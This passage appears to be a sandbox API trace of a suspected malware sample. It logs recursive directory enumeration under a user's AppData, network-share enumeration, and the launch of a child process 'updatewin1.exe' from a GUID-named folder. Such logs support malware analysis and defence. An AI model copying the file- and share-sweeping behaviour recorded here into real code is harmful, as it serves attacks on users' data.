ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.459] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.459] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.459] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.459] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.459] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\") returned="nrw\\" [0061.459] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.459] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.459] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.459] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.459] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.459] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.459] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.459] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.459] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.459] PathFindFileNameW (pszPath="") returned="" [0061.460] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.460] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.460] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.460] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.460] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.460] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.460] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\") returned="prt\\" [0061.460] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.460] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.460] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.460] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.460] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.460] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.460] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.460] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.460] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.460] PathFindFileNameW (pszPath="") returned="" [0061.461] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.461] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.461] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.461] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.461] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.461] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.461] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\") returned="spn\\" [0061.461] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.461] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.461] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.461] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.461] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.461] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.461] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.461] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.461] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.461] PathFindFileNameW (pszPath="") returned="" [0061.462] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.462] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.462] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.462] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.462] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.462] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.462] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\") returned="swd\\" [0061.462] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.462] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.462] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.462] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.462] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.462] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.462] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.462] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.463] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.463] PathFindFileNameW (pszPath="") returned="" [0061.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.463] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.463] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.463] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.463] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.463] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.463] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\") returned="si\\" [0061.463] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0061.463] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0061.463] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0061.463] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0061.463] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.463] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.463] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.464] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.464] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.464] PathFindFileNameW (pszPath="") returned="" [0061.464] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.464] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.464] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.464] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.464] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.464] SendMessageW (hWnd=0x5011e, Msg=0x8003, wParam=0x0, lParam=0x0) Thread: id = 47 os_tid = 0x9e4 [0042.705] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0xa08fee0 | out: lphEnum=0xa08fee0*=0x323e360) returned 0x0 [0043.025] WNetEnumResourceW (in: hEnum=0x323e360, lpcCount=0xa08fedc, lpBuffer=0x9c6b710, lpBufferSize=0xa08fed8 | out: lpcCount=0xa08fedc, lpBuffer=0x9c6b710, lpBufferSize=0xa08fed8) returned 0x0 [0043.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298728 [0043.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298770 [0043.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0043.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32987b8 [0043.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298800 [0043.025] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x9c6b710, lphEnum=0xa08fe28 | out: lphEnum=0xa08fe28*=0x6aa470) returned 0x0 [0043.114] WNetEnumResourceW (in: hEnum=0x6aa470, lpcCount=0xa08fe24, lpBuffer=0x32a8fe8, lpBufferSize=0xa08fe20 | out: lpcCount=0xa08fe24, lpBuffer=0x32a8fe8, lpBufferSize=0xa08fe20) returned 0x103 [0043.114] WNetCloseEnum (hEnum=0x6aa470) returned 0x0 [0043.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298770 | out: hHeap=0x660000) returned 1 [0043.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298728 | out: hHeap=0x660000) returned 1 [0043.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298728 [0043.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298770 [0043.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xe0) returned 0x32652c0 [0043.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298338 [0043.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298848 [0043.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298800 | out: hHeap=0x660000) returned 1 [0043.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32987b8 | out: hHeap=0x660000) returned 1 [0043.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32695e0 | out: hHeap=0x660000) returned 1 [0043.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32987b8 [0043.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298800 [0043.114] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x9c6b730, lphEnum=0xa08fe28 | out: lphEnum=0xa08fe28*=0xa08fe44) returned 0x4b8 [0058.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298770 | out: hHeap=0x660000) returned 1 [0058.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298728 | out: hHeap=0x660000) returned 1 [0058.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0058.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x150) returned 0x3247810 [0058.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298728 [0058.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298770 [0058.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298d58 [0058.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298da0 [0058.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298848 | out: hHeap=0x660000) returned 1 [0058.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298338 | out: hHeap=0x660000) returned 1 [0058.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298800 | out: hHeap=0x660000) returned 1 [0058.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32987b8 | out: hHeap=0x660000) returned 1 [0058.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32652c0 | out: hHeap=0x660000) returned 1 [0058.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257390 [0058.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0058.366] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x9c6b750, lphEnum=0xa08fe28 | out: lphEnum=0xa08fe28*=0xa08fe44) returned 0x4c6 [0058.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.369] WNetEnumResourceW (in: hEnum=0x323e360, lpcCount=0xa08fedc, lpBuffer=0x9c6b710, lpBufferSize=0xa08fed8 | out: lpcCount=0xa08fedc, lpBuffer=0x9c6b710, lpBufferSize=0xa08fed8) returned 0x103 [0058.369] WNetCloseEnum (hEnum=0x323e360) returned 0x0 [0058.369] SendMessageW (hWnd=0x5011e, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 48 os_tid = 0x9f0 Process: id = "6" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" page_root = "0x4e22c000" os_pid = "0x9e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x938" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 49 os_tid = 0x9ec [0043.422] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x183dffb0, dwHighDateTime=0x1d5956a)) [0043.422] GetCurrentProcessId () returned 0x9e8 [0043.422] GetCurrentThreadId () returned 0x9ec [0043.422] GetTickCount () returned 0x11446f0 [0043.422] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=16359802195) returned 1 [0043.435] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS 